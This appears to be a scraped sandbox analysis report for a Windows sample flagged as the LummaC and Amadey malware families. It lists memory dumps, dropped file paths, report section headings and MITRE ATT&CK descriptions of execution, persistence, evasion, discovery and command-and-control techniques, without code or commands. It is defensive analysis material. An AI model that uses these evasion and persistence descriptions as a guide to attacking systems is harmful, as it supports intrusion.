Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 2d7b5a39145c7106adb9420d9b905b86b969fea48a946fad39f5ca12fb436e89
Instruction ID: 487b5482d904bb2fc6c0afa5df4c481946149f96db5c42fe8aac7df8090f1ca6
Opcode Fuzzy Hash: 2d7b5a39145c7106adb9420d9b905b86b969fea48a946fad39f5ca12fb436e89
Instruction Fuzzy Hash: 6C211D71E01119AFEF00EBA4D991DFEB7B9EF08710F100029F905A7292DB349D01ABA0

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\Temp\.gif

C:\Temp\.hta (copy)

C:\Temp\A9Dfw7SLp.gif (copy)

C:\Temp\A9Dfw7SLp.txt

C:\Temp\CAvWBYtqI.gif (copy)

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre